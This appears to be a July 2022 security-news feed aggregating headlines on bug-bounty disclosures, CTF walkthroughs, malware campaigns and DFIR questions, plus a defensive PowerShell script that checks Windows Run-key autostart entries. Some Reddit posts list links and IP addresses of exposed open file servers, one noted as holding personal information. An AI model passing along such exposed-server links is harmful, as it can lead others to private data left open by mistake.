    From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
    submitted by /u/SCI_Rusher [link] [comments]
    Interview with a 16-year-old Lapsus$ Hacker
    submitted by /u/cybersocdm [link] [comments]

    SecWiki News 2022-07-12 Review
    afrog releases new version Release 1.3.5 "Really miss you" by 胖胖的ALEX; Building a breach-and-attack-simulation exercise platform by ourren; Open-source security: challenges, solutions and opportunities by ourren; Learning continuous integration security from a CI/CD vulnerability range by ourren; Bad Packet: measuring in-the-wild IoT botnet activity by Avenger; SecWiki Weekly (Issue 436) by ourren; For more of the latest articles, visit SecWiki

    Write Up 1: Hellosign Integration [Full Read SSRF]
    In the name of God, the Most Gracious, the Most Merciful Continue reading on Medium »
    Multiple $50,000 Reward Tickets in Aleph Zero’s and Immunefi’s Bug Bounty Program
    Aleph Zero has decided to partner with Immunefi to deliver a bug bounty program dedicated to seeking out vulnerabilities that may hinder… Continue reading on Aleph Zero Foundation »
    Business Logic Vulnerability — REGISTRATION Using Fake Email Account & Valid Company Name
    Description: Continue reading on Medium »
    Recox v2.0 -classifying vulnerabilities in web applications
    The script’s goal is to aid in the classification of vulnerabilities in web applications. RecoX, the emerging methodology, can detect… Continue reading on Medium »
    CSRF Vulnerability
    Hello, welcome to my new article, this article will talk about how I found CSRF on the login page. First, let me introduce myself, my name… Continue reading on Medium »
    What Bug Bounty is and why it is now also used by cybercrime
    by Víctor Ruiz, founder of SILIKN and certified cybersecurity instructor — CSCT™. Continue reading on Medium »

    ChromeLoader: New Stubborn Malware Campaign
    A malicious browser extension is the payload of the ChromeLoader malware family, serving as adware and an infostealer, leaking users’ search queries. The post ChromeLoader: New Stubborn Malware Campaign appeared first on Unit 42.

    Attacking Active Directory: TryHackMe
    Today, we are up with yet a new walkthrough, but the domain is something interesting. We would be looking at a room on TryHackMe called… Continue reading on Medium »
    What is Red-Team Testing | Red Team Assessment- Komodo Cyber Security
    WHY DO YOU NEED A RED-TEAM? Continue reading on Medium »

    Huge list of cell phone ringtones
    http://onj3.andrelouis.com/phonetones/unzipped/ submitted by /u/Buzz1ight [link] [comments]
    Another huge list of ODs! :D (31 ODs)
    https://openweb.uz/apps/ - Software http://iranfl.persiangig.com - Misc http://www.4oneworld.org/files/ - Images http://www.andrelouis.com/media/ - Music & some other stuff https://gstreamer.freedesktop.org/media/ - Video & Music (and some other stuff) http://www.geo.mtu.edu/volcanoes/boris/ - Misc http://www.narrowbandimaging.com/incoming/ - Misc https://son.rochester.edu/assets/images/ - Images http://lamborns.com/pictures/ - Images https://ww2.cs.fsu.edu/~curci/ - PDFs and Images https://ftp.tourmentine.com - Images, MP3s, Videos, and some other stuff https://natewren.com/themes/ - Images https://websitearchive2020.nepa.gov.jm/new/ - Misc https://ferry-county.com/Images/ - Images http://shortpumppourhouse.com/images/ - Images http://www.pezlist.com/mcpez/images/ - Images http://www.sckans.edu/ext/ - Misc https://otlibrary.com/wp-content/gallery/ - Images http://www.nwhiker.com/wallpaper/ - Images https://jorge.fbarr.net/files/ - Misc https://ftp.mpi-inf.mpg.de/pub/ - Misc http://www.4oneworld.org/files/ - Dead https://www.cs.cmu.edu/~quake-papers/ - Misc http://ftp.esrf.eu | ftp://ftp.esrf.eu - Misc https://hippych.com/files/ - Misc http://46.219.24.140 - Misc http://www.lookas.net/ftp/ - Software & some other stuff https://www2.census.gov https://ftp.sangoma.com - Software https://downloads.thebobsgamingnetwork.net - Minecraft server? https://www.stchur.com/personal/ - Random http://tomflahertymusic.com/mp3s/ - MP3s *New! http://penguinradio.dominican.edu - Audio & MP3s ​ Pastebin: https://pastebin.com/Np7iufPw submitted by /u/ilikemacsalot [link] [comments]
    short history documentaries, survival guides and other miscellaneous stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Dungeons and Dragons stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

    Rolling-PWN vulnerability affects all Honda vehicles
    Article URL: https://rollingpwn.github.io/rolling-pwn/ Comments URL: https://news.ycombinator.com/item?id=32066201 Points: 141 # Comments: 93

    Github base action takeover which is used in `github.com/Shopify/unity-buy-sdk`
    Shopify disclosed a bug submitted by codermak: https://hackerone.com/reports/1439355 - Bounty: $800

    Voltage glitch injection on nRF52 platform chips to bypass debug protection
    Author: 轨道教主. Original link: https://www.bilibili.com/read/cv17283492 Vulnerability principle: to prevent the vulnerability that appeared in the nRF51, the chip vendor added the APPROTECT feature to the nRF52 to stop the debug interface from being used while in the protected state; the feature is implemented by directly disconnecting communication between the debug interface and the CPU. APPROTECT is enabled by writing 0xFFF... to address 0x10001208 in the User Information Configuration Registers (UICR)

  • Open

    Finding insecure web cameras
    OSINT Continue reading on Medium »
    War in Ukraine / July 8–10
    👉 Overview of the activities of the Verkhovna Rada: One MP Less, Five Unapproved Initiatives and «DNA Database» Continue reading on Medium »
    How to perform an OSINT analysis of a toxic IP address (case study)
    How to identify a toxic IP address, analyze it, and prove its involvement in an attack. OSINT analysis of an IP. Network reconnaissance. Attack investigation. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    [h1-2102] HTML injection in packing slips can lead to physical theft
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1087122 - Bounty: $900
    [h1-2102] Stored XSS in product description via `productUpdate` GraphQL query leads to XSS at handshake-web-internal.shopifycloud.com/products/[ID]
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1085546 - Bounty: $1600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserTfaEnforcement
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1085042 - Bounty: $950
    Improper deep link validation
    Shopify disclosed a bug submitted by fr4via: https://hackerone.com/reports/1087744 - Bounty: $600
    Collaborators and Staff members without all necessary permissions are able to create, edit and install custom apps
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1555502 - Bounty: $1900
    Theme editor `oseid` parameter is leaked to third-party services through the `Referer` header which leads to somekind of storefront password bypass.
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1262434 - Bounty: $500
    Able to view hackerone reports attachments
    GitLab disclosed a bug submitted by sateeshn: https://hackerone.com/reports/979787 - Bounty: $12000
    Mass Account Takeover at https://app.taxjar.com/ - No user Interaction
    Stripe disclosed a bug submitted by beerboy_ankit: https://hackerone.com/reports/1581240 - Bounty: $11500
    Getting a free delivery by signing up from "admin_@glovoapp.com"
    Glovo disclosed a bug submitted by cmuppin: https://hackerone.com/reports/1296584
    Server Side Template Injection on Name parameter during Sign Up process
    Glovo disclosed a bug submitted by battle_angel: https://hackerone.com/reports/1104349
  • Open

    leveraging the SQL injection to execute the XSS by evading CSP.
    Although it sounds silly, I am dumb enough to do this. Continue reading on Medium »
  • Open

    Paraswap Deposits 1M PSP to Their Bug Bounty via Hats Finance
    Another project extends their long term commitment to security! Shoutout to Paraswap for depositing 1M PSP tokens to their bug bounty in… Continue reading on Medium »
    Hacking on a Private Program (Salesforce CRM)
    I was hunting on a private program on HackerOne, so let's call it developer.target.com. I found a register option, so I registered there, and after… Continue reading on System Weakness »
    MSA Weekly 3 — “How to Approach Your Target Machine — Nmap Technique”
    Hi hi, warm greetings, friends. May we always be under the protection of God Almighty. Continue reading on Medium »
    Hackers Exploiting Follina Bug to Deploy Rozena Backdoor
    A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously… Continue reading on Medium »
  • Open

    MimiKatz for Pentester: Kerberos
    This write-up will be part of a series of articles on the tool called Mimikatz, which is written in the C programming language. It is… The post MimiKatz for Pentester: Kerberos appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-07-11 Review
    No new items today. For more of the latest articles, visit SecWiki
  • Open

    Cyber Certifications Are A Scam!
    Summary: Vendor Certifications serve the vendor more than they do the student. Skill-based certifications with written exams can’t… Continue reading on Medium »
  • Open

    hijagger: Checks all maintainers of all NPM and Pypi packages for hijackable packages through domain re-registration
    submitted by /u/FireFart [link] [comments]
    WAF from scratch
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    photos of missile launch systems
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Lots of MMO screenshots from the early 2000s
    Marked as nsfw for occasional naughty humor + the fact that I haven't looked through everything http://www.sheffy.org/ao/ss/ submitted by /u/chloroformica [link] [comments]
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    FreeBuf Morning Report | PyPI requires maintainers of critical projects to use 2FA; Kingsoft responds to locking a web novelist's manuscript
    A web novel author posted on the Longtian (龙的天空) forum that the manuscript of their novel had been locked by Kingsoft's WPS Office. The official WPS Weibo account issued a statement in response on the afternoon of July 11.
    A WAF design based on tracking markers
    The WAF described here not only has the functions of a traditional WAF but can also identify and track attackers.
    Mangatoon data breach, more than 20 million accounts affected
    The comic-reading platform Mangatoon suffered a data breach in which a hacker stole and leaked the account information of more than 23 million users.
    Disney's Instagram and Facebook accounts hacked, threat actor posts malicious content
    Disney's Facebook and Instagram accounts were taken over by someone calling themselves a "super hacker".
    Key points of Malaysia's data compliance regime
    Malaysia was an early adopter of data protection: it enacted its Personal Data Protection Act as early as 2010 to regulate the collection, use and disclosure of personal data.
    Multiple Honda models vulnerable, vehicles can be remotely controlled
    Some Honda models are affected by the Rolling-PWN attack, which can allow a car to be remotely unlocked and even remotely started.
    Jian Siting: ICS security is niche but has unlimited potential | TTSP security think-tank expert interview
    His six years in the industry coincided with the six years in which ICS security began to grow noticeably. In a recent FreeBuf interview he discussed the development of ICS security and where it is heading.
    New 0mega ransomware carries out double-extortion attacks on enterprises
    A new ransomware called "0mega" is conducting double-extortion attacks against organizations worldwide and demanding ransoms of millions of dollars from victim companies.
  • Open

    Data Science & infosec
    Hi all, a bit of background: I work in a risk management role, but I'm somewhat starting out and got comfortable. Of course I miss the technical and programming world. That being said, I want to do a data analytics/visualization project but am not sure what risks or what areas of infosec would be most valuable to really any organization's CISO or IT security, but also an area of infosec that has data I could use. So my question is: what data-related project in infosec can I do that involves data viz & analytics? I've done some research but could find up-to-date datasets. I also want to say that it would be cool to see deep web related stuff, for example scanning forums and triggering if I get an organization's name? But maybe that's a bit too advanced. Thanks! submitted by /u/ceizaralb [link] [comments]
  • Open

    EXIF - ImageUniqueID
    Hi, does anyone have some knowledge around "ImageUniqueID" when analyzing images? I found that this ID should be unique for every picture taken, but what if multiple images have the same "unique" ID? Am I right in saying that two pictures that have the same "ImageUniqueID" have been captured with the same device? Thankful for any response! submitted by /u/lasagne_forensics [link] [comments]
  • Open

    The RCE bible!
    Author: ZAC安全. Original: https://mp.weixin.qq.com/s/gtArMfC2Xq9IEpwvu8Sszg. 00 Introduction and basic concepts: RCE stands for remote command/code execution. What does RCE get you? It amounts to being able to run arbitrary commands on your computer, which in turn lets me bring your host online in MSF/CS and take full control of it, so in penetration testing, personally...
  • Open

    Homograph attack bypass cause redirection
    Vanilla disclosed a bug submitted by malek: https://hackerone.com/reports/1285245 - Bounty: $50
    Blind SSRF at packagist.maximum.nl
    Radancy disclosed a bug submitted by dk4trin: https://hackerone.com/reports/1538056 - Bounty: $75
  • Open

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on System Weakness »
    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on Medium »
    Active Directory — Abusing a Kerberos Resource
    Hello Hackers! Continue reading on Medium »
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    SecWiki News 2022-07-10 Review
    No new items today. For more of the latest articles, visit SecWiki
  • Open

    Cryptomining malware
    All operations below were performed on CentOS 7. For reference only; every country prohibits illegal hacking, and you bear the consequences yourself!
    Notes on an SQL injection found in a sort parameter during a real penetration test
    A quick trick for spotting SQL injection and dumping the database name with Burp.
    Java code audit: XSS
    An XSS attack usually means exploiting a flaw left during web page development to inject malicious instructions into the page by some clever method, so that the user loads and executes a malicious web program crafted by the attacker.
    Online programming IDE = remote cyberattack?
    Hackers typically launch attacks from compromised machines rather than directly from devices they own, which lets them hide their origin.
    [From shallow to deep, building a solid foundation] Understanding XPath injection in one article
    XPath is used to find information in XML or HTML, just as SQL statements are used to query information in a database.
    What liabilities does a digital collectibles platform bear when it shuts down?
    Starting from the platform's "standard-form terms", this article explores the legal liabilities a digital collectibles platform may face when exiting the market.
  • Open

    Identifying and verifying Chinese PLA Navy with OSINT.
    Ship recognition is still important, sailors in the navy still receive lessons in visual recognition. Yet the attention seems to be… Continue reading on Medium »
    How to organize monitoring of your reputation in the media?
    Let’s learn how to monitor our reputation background in russian online media today. Today it is becoming a must for any public person. Continue reading on Medium »
    SPY NEWS: 2022 — Week 27
    Summary of the espionage-related news stories for the Week 27 (July 3–9) of 2022. Continue reading on Medium »
    Attacks via a Representative Sample : Myths and Reality
    Imagine the situation: you are an employee of a secret service, and your task is to calculate a particularly dangerous criminal, engaged… Continue reading on Medium »
  • Open

    Status, Vulnerability, and Status Vulnerability
    Article URL: https://eriktorenberg.substack.com/p/status-vulnerability-and-status-vulnerability Comments URL: https://news.ycombinator.com/item?id=32043881 Points: 1 # Comments: 0
  • Open

    Practical Approach on Securing Web Sessions
    submitted by /u/quercialab [link] [comments]
  • Open

    Free cybercrime intelligence tool - check any company domain and see how many of their employees and clients were compromised by info-stealers
    Check domains for free across our database of over 5,700,000 computers compromised with info-stealers world wide - https://www.hudsonrock.com/are-you-compromised Also available via https://inteltechniques.com/tools/Breaches.html under "HudsonRock" What is it? - this free tool enables you to search for domains and see how many compromised employees & users they have from our continuously augmented cybercrime database, this can be useful for several reasons: Risk assessment - looking up a company and seeing they have a lot of compromised employees can indicate the company is not up to date with proper security measures, each compromised employee indicates that someone in the company downloaded and executed an info-stealing malware and had all their corporate credentials, cookies, docume…
  • Open

    Best offline AV/Scan bootable
    Need to retrieve ~128G of files from a suspected corrupted USB drive received from an untrustworthy source. No other way to capture source data. Been years since I have been in need of a bootable AV and don't recognize the product landscape. Looking for a scanner which can target specified external USB drives. Bonus if it does everything from rootkits to malware and more. submitted by /u/QuantumFiddle [link] [comments]
    Computer Ransomwared
    My aunts company had a few computers ransomwared. Where on the tor could I go look to see if any of her data is for sale. I found a couple of old links. Anyone have any sources? submitted by /u/jamestech221 [link] [comments]
  • Open

    Couple with movies/tv etc. 1 posted about a year ago, the other... new to us it would seem!
    http://www.moviefyy.com/ EDIT: removed cause it does indeed have some personal info (and frankly huge wedding photo files!) Prophylactic [NSFW] tag just in case. submitted by /u/ringofyre [link] [comments]
    New to OD, need advice on how to open video files
    How do i open files like this one (AVI and other video files, already tried using VLC didn't work) https://www.mmnt.net/db/0/0/89.178.3.122/sdb1/Big%20Tit%20Superstars%20Of%20The%2070's%20-%20Carol%20Connors is the file broken or is there any other way? submitted by /u/Pink__banana [link] [comments]
    Decade Old PC software and drivers
    http://31.48.171.80:86/Public/Software/ submitted by /u/SeniorAlbatross [link] [comments]
    Czech/Slavic Ebooks
    submitted by /u/SeniorAlbatross [link] [comments]

  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    DoS via lua_read_body() [zhbug_httpd_94]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1596252 - Bounty: $480
    Apache HTTP Server: mod_proxy_ajp: Possible request smuggling
    Internet Bug Bounty disclosed a bug submitted by ricterz: https://hackerone.com/reports/1594627 - Bounty: $2400
    Read beyond bounds via ap_rwrite() [zhbug_httpd_47.2]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595299 - Bounty: $480
    Read beyond bounds in mod_isapi.c [zhbug_httpd_41]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595296 - Bounty: $480
    Controllable read beyond bounds in lua_websocket_readbytes() [zhbug_httpd_126]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595290 - Bounty: $480
    Read beyond bounds in ap_strcmp_match() [zhbug_httpd_47.7]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595281 - Bounty: $480
  • Open

    Does "Autostart" Really Mean "Autostart"?
    Most DFIR and SOC analysts are familiar with the Run keys as autostart locations within the Windows Registry: [HKLM|HKCU]\Software\Microsoft\Windows\CurrentVersion\Run Values beneath these keys are automatically run asynchronously upon system start and user login, respectively. This is something we've known for a while, and we've dutifully incorporated these autostart locations into our "indicators of program execution" artifact category. It turns out that may not be the case. Wait...what? Did I just say that a value listed in one of the aforementioned Run keys may not, in fact, be executed at system start or user login? Yes...yes, I did. Let's first start with validating that the entries themselves have been run. We know that we can parse the Microsoft-Windows-Shell-Core%4Operational E…
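    The validation step the post describes, as an added example (this is not code from the post or its author): it enumerates the Run values under HKLM and HKCU, reads the per-value enable/disable flag Explorer keeps under Explorer\StartupApproved\Run (first byte 0x02 means enabled, 0x03 means the user disabled it in Task Manager's Startup tab, so the value is still present in Run but is skipped at logon), and then looks for "Started execution of command" events (ID 9707) in Microsoft-Windows-Shell-Core/Operational to see whether each command was actually launched. It assumes the script runs on the live system as the user of interest (elevated for HKLM), that the Shell-Core Operational log is enabled, and matches commands by exact string comparison; on an offline image you would point the same logic at the mounted hives and the exported .evtx file instead.

```powershell
# Added example: cross-check Run-key autostart values against the
# StartupApproved flag and Shell-Core "Started execution" events (ID 9707).
# Assumptions: live system, HKCU of the current user, HKLM readable; the
# Microsoft-Windows-Shell-Core/Operational log is enabled.

$runKeys = @(
    @{ Hive = 'HKLM'; Path = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' },
    @{ Hive = 'HKCU'; Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' }
)

# Explorer stores one REG_BINARY value per Run entry here. First byte 0x02 =
# enabled, 0x03 = disabled (the rest of a disabled value is the FILETIME of
# when it was switched off). No entry at all means Explorer never recorded it.
function Get-StartupApprovedState {
    param([string]$Hive, [string]$ValueName)
    $approved = "${Hive}:\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run"
    if (-not (Test-Path $approved)) { return 'unknown' }
    $item = Get-ItemProperty -Path $approved -ErrorAction SilentlyContinue
    if ($null -eq $item -or -not ($item.PSObject.Properties.Name -contains $ValueName)) { return 'no-entry' }
    $bytes = [byte[]]$item.$ValueName
    switch ($bytes[0]) {
        2       { 'enabled' }
        3       { 'disabled' }
        default { 'unknown(0x{0:X2})' -f $bytes[0] }
    }
}

# Collect the command lines that Explorer actually started. Event 9707 carries
# the command as its first message parameter, so key on that rather than on
# the rendered message text (which varies with display language).
$started = @{}
try {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Shell-Core/Operational'; Id = 9707 } -ErrorAction Stop |
        ForEach-Object {
            $cmd = [string]$_.Properties[0].Value
            if ($cmd) {
                if (-not $started.ContainsKey($cmd)) { $started[$cmd] = @() }
                $started[$cmd] += $_.TimeCreated
            }
        }
} catch {
    # Get-WinEvent throws when the log is empty, disabled or unreadable.
    Write-Warning "Could not read Shell-Core Operational log: $_"
}

foreach ($k in $runKeys) {
    if (-not (Test-Path $k.Path)) { continue }
    $props = Get-ItemProperty -Path $k.Path
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip the provider's own PSPath/PSDrive/... properties
        $cmdLine = [string]$p.Value
        $state   = Get-StartupApprovedState -Hive $k.Hive -ValueName $p.Name
        $runs    = $started[$cmdLine]
        [pscustomobject]@{
            Hive            = $k.Hive
            ValueName       = $p.Name
            Command         = $cmdLine
            StartupApproved = $state
            ObservedStarts  = if ($runs) { $runs.Count } else { 0 }
            LastStarted     = if ($runs) { ($runs | Sort-Object -Descending)[0] } else { $null }
        }
    }
}
```

    A Run value that reports StartupApproved = disabled, or enabled with zero observed starts across the log's retention window, is exactly the case the post warns about: present in an autostart location, but not evidence that the program ran. Treat the 9707/9708 pair as the execution artifact and the Run value only as the persistence artifact.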
  • Open

    HacktheBox[routerspace]
    Initial full TCP Nmap scan of the box reveals ports 80 and 22 are open: Continue reading on Medium »
  • Open

    SecWiki News 2022-07-09 Review
    No new items today. For more of the latest articles, visit SecWiki
  • Open

    ATT&CK Execution techniques: attack and defense
    Many topics in this article are not discussed further; interested readers can message me or discuss them in the comments.
  • Open

    Figuring out what I want to be when I grow up
    I'm a just over 40 y/o IT Professional who in the last couple of years managed to get out of system administration to now working in a SOC. In the last 5-ish years I got my Security+, CySA+ and CISSP. Currently my role in the SOC is more of an administrator of tools that the the IR and Vulnerability people use, and not much hands on using the tools. I'm trying to figure out what direction I should go and what my next steps should be, and if there is a title/job description (not literally) that I should look towards as a goal for the time being. At this time I don't want to go into a management area, I like having my hands on keyboards and not in meetings. I do like doing the vulnerability scanning and remediation, the only thing in my current workplace the vulnerability team does the scanning and informs the administrative teams what needs to be remediated. Incident Response and Threat analytics sounds interesting but also high stress. I've been looking at penetration testing and red teaming as a direction to study but as I'm going through stuff I don't feel like I have the temperament of "gotta pwn the system" and because of that I feel like there are younger people better suited to doing that. What conceptually sounds good to me is something like being a consultant where I'm part of a team that does the security assessment for organizations and helps to identify where the vulnerabilities are, do the risk analysis and remediate the issues. I may have answered my own question with that, but is there a job role/title like that which I can use as a guide to figure out what sort of training I need to position myself for it? submitted by /u/beerdini [link] [comments]
    POV: you are at your favorite cafe with a hacker who hijacked the router.
    You are a cyber security specialist who enters the café with your laptop to check your company's self-hosted email server while sipping your favorite latte "or whatever drink you want to sip". You have connected your laptop to the public access point, which was set up by a self-hating person who didn't even bother to change the router's credentials (usr=admin, pass=admin). There is a hacker who was sent by your company's competitor and he's in the same shop you're in, but you can't tell, since there are 4 people connected to the same hotspot as you are, using their own laptops (a total of 5 people currently connected to the Wi-Fi hotspot). The hacker took advantage of that and changed the router's credentials and gained complete control of the ISP-provided router before initiating his attack, and his goal is to eavesdrop on your company's plans and secrets. What sort of unauthorized attack can the hacker do to eavesdrop? How would you defend yourself against the attacker (assuming you started to suspect after you have connected to the same hotspot for a while using no VPN)? What would you do to spot the hacker? submitted by /u/6TedtheUnDead9 [link] [comments]
    Vulnerability scanning tools for multi-networks?
    I’m looking to start a vulnerability management business. I’m aware of tools such as Nessus, nexpose etc. I’m looking for a tool, paid or open source to start. I’m wanting to do vulnerability scans on multiple different networks, doing the vulnerability scans for businesses and giving them the CVE reports. Is there any tools that would be good for this? Nessus, and nexpose seem to be good for a permanent solution for a single business that manages their own vulnerability scans, where I need more of something that I can use on multiple networks. OpenVAS appears to be free but not a good solution for multiple different networks, especially not scanning servers. Any thoughts or advice would be appreciated Thanks In advance submitted by /u/AggravatingShame576 [link] [comments]
  • Open

    Fuzzing the Rust Typechecker Using Constraint Logic Programming [pdf]
    Article URL: https://sites.cs.ucsb.edu/~benh/research/papers/dewey15fuzzing.pdf Comments URL: https://news.ycombinator.com/item?id=32034841 Points: 2 # Comments: 0
  • Open

    photos of physicists
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Been posted here before, but it's regularly updated.
    Last posted 158Days ago. http://192.64.86.228/%5bb%5d/ Credits to u/JiminythecricketinOz submitted by /u/amritajaatak [link] [comments]

  • Open

    How I hacked the JEE coaching Website and shutdown the class live-stream
    STORY Continue reading on Medium »
    The Ultimate Kali Linux Book
    Perform advanced penetration testing using Nmap, Metasploit, Aircrack-ng, and Empire Continue reading on Medium »
    How Burpsuite-pro helped me to get a 5 digit Bounty !
    Hello ppl, This is Aravind here with another awesome write-up. So now am gonna tell the story about how burpsuite pro helped me to get a 5… Continue reading on Medium »
    APT Groups with AI Generated Images
    I ran some APT Group names through Google’s AI image generator. Results are probably what you’d expect. Continue reading on Medium »
    Finding SQL Injections through source code in .NET applications
    CodeAllTheThings Continue reading on Medium »
    Innovation in the Free World
    Objective Reviewers Continue reading on Medium »
    Account Takeover via Response Manipulation
    Hello everyone I am Abhishek pal here* with my First blog ,In this blog I am going to give details about an easy P1 bug I encountered… Continue reading on Medium »
  • Open

    [OSINT Walkthrough] Solving a Twitter OSINT Challenge #01
    I’ve notice a lot of good Twitter OSINT challenges lately, so I decided to take some of them. This will be a series of OSINT challenges… Continue reading on Medium »
    Ethereum (ETH) investigations
    Ethereum (ETH) is the second most popular cryptocurrency in the world, as well as a platform for creating decentralized online services… Continue reading on Medium »
    Kremlin’s “fervid patriotism” and the emergence of “vozmezdiye”
    Sifting through the claims made by Russia from Bucha to Kremenchuk, all what the fact-checkers have found is a string of blatant lies. Continue reading on Medium »
    War in Ukraine / July 7
    HIMARS slow down the advance of Russian troops Continue reading on Medium »
  • Open

    Unauthorized packages modification or secrets exfiltration via GitHub actions
    Hyperledger disclosed a bug submitted by dusty_wormwood: https://hackerone.com/reports/1548870 - Bounty: $1500
    Open Redirect through POST Request in www.redditinc.com
    Reddit disclosed a bug submitted by kratul: https://hackerone.com/reports/1310230
    Exposed valid AWS, Mysql, Sendgrid and other secrets
    Glovo disclosed a bug submitted by mehdisadir: https://hackerone.com/reports/1580567
  • Open

    SecWiki News 2022-07-08 Review
    Building a defense system for the national attack-and-defense exercises by ourren; A brand-new kind of in-memory webshell by ourren; Building your own trusted phishing mail server by ourren; Ten years of doing research in software engineering! by ourren; For more of the latest articles, visit SecWiki
  • Open

    Syndication.photoslibrary... What is this thing?
    I'm trying to figure out this path for the Syndication.photoslibrary folder. The device I am working on is an iPhone 11 running iOS 15.5. There is a video stored within the following path: private/var/mobile/Library/Photos/Libraries/Syndication.photoslibrary/scopes/syndication/originals/ This video appears in the camera roll with the iOS naming (IMG_XXXX.mp4) and shows it was downloaded from a messaging app. When it is located in the syndication folder, it appears to have a hexadecimal value for the naming convention, ending in .mp4. There is also an instance of this video in the SMS/Attachments path, ending with IMG_XXXX.mp4, with the same hash value. When searching for the IMG_XXXX naming convention, all the other file hits go to private/var/mobile/Media/PhotoData/... There …
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Bugs, pests and Crops!
    How do I keep finding these. Buncha bugs, Pests, crop viruses, crops, and insects. https://www.thesheepsite.com/diseaseinfo/images/ https://agritech.tnau.ac.in/crop_protection/rice/ http://vegetablemdonline.ppath.cornell.edu/Images/ submitted by /u/amritajaatak [link] [comments]
    Tons of random stuff (Software, Movies, Shows)
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Scanning 1.7 million Australian domains and finding 1.62 million SPF & DMARC security issues
    submitted by /u/caniphish_ltd [link] [comments]
  • Open

    120,000 practitioners in sync! CIS Cybersecurity Innovation Conference summer edition: surfing the "metaverse" together
    8 hours of livestream, 20-plus topics: the summer surfing party for 120,000 cybersecurity practitioners came to a successful close!
    "Douxiang attack-and-defense exercise handbook": how to "sweep the mines" of weak passwords
    The Jianwei password security audit system helps enterprises solve the weak-password problem during attack-and-defense exercises, improving the user security system from every angle.
    Research on WAF bypasses caused by parameterization
    In the previous two articles we analyzed the WAF bypasses that can arise in the encoding and normalization stages. As concluded there, parameterization is another important stage in the WAF's processing, and this stage likewise offers ways to bypass the WAF.
    Apple to launch new security feature "Lockdown Mode" to protect devices from spyware
    Apple announced plans to introduce a new mode, Lockdown Mode, in iOS 16, iPadOS 16 and macOS Ventura.
  • Open

    External Attack Surface Management for Red Teaming
    The modern cyber threat landscape sees an ever-expanding influx of malicious actors using a slew of tactics, techniques, and tools to… Continue reading on Medium »
  • Open

    CVE-2022-33980: Apache Commons Configuration2 Arbitrary Code Execution
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-33980 Comments URL: https://news.ycombinator.com/item?id=32024034 Points: 2 # Comments: 0
  • Open

    "Password protection" in Azure
    Hi there. Can someone explain how password protection works in Azure? As I understand it, it bans a variety of one word; for example, if users like to use passwords like qwerty123!, 123qwerty%, qwertyyy4636, etc., I can ban them by the word "qwerty", yes? If there are such passwords: Qwer1234!@#$ Q!w2e3r4t5 Qwedcxzas4, to ban them can I use only the one word qwerty? Or do I need to use separate words for each of them? Qwer1234!@#$ -> qwer Q!w2e3r4t5 -> qwert (or no?) Qwedcxzas4 -> qwedcxzas submitted by /u/athanielx [link] [comments]

  • Open

    Clickjacking Vulnerability In Whole Page Ads Tiktok
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1418857 - Bounty: $500
    HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524555
    HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524692
    HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1501679
    Brute force of a current password on a disable 2fa leads to guess password and disable 2fa.
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1465277
    Remote denial of service in HyperLedger Fabric
    Hyperledger disclosed a bug submitted by fatal0: https://hackerone.com/reports/1604951 - Bounty: $1500
    Stack Buffer Overflow via `gmp_sprintf`in `BLSSignature` and `BLSSigShare`
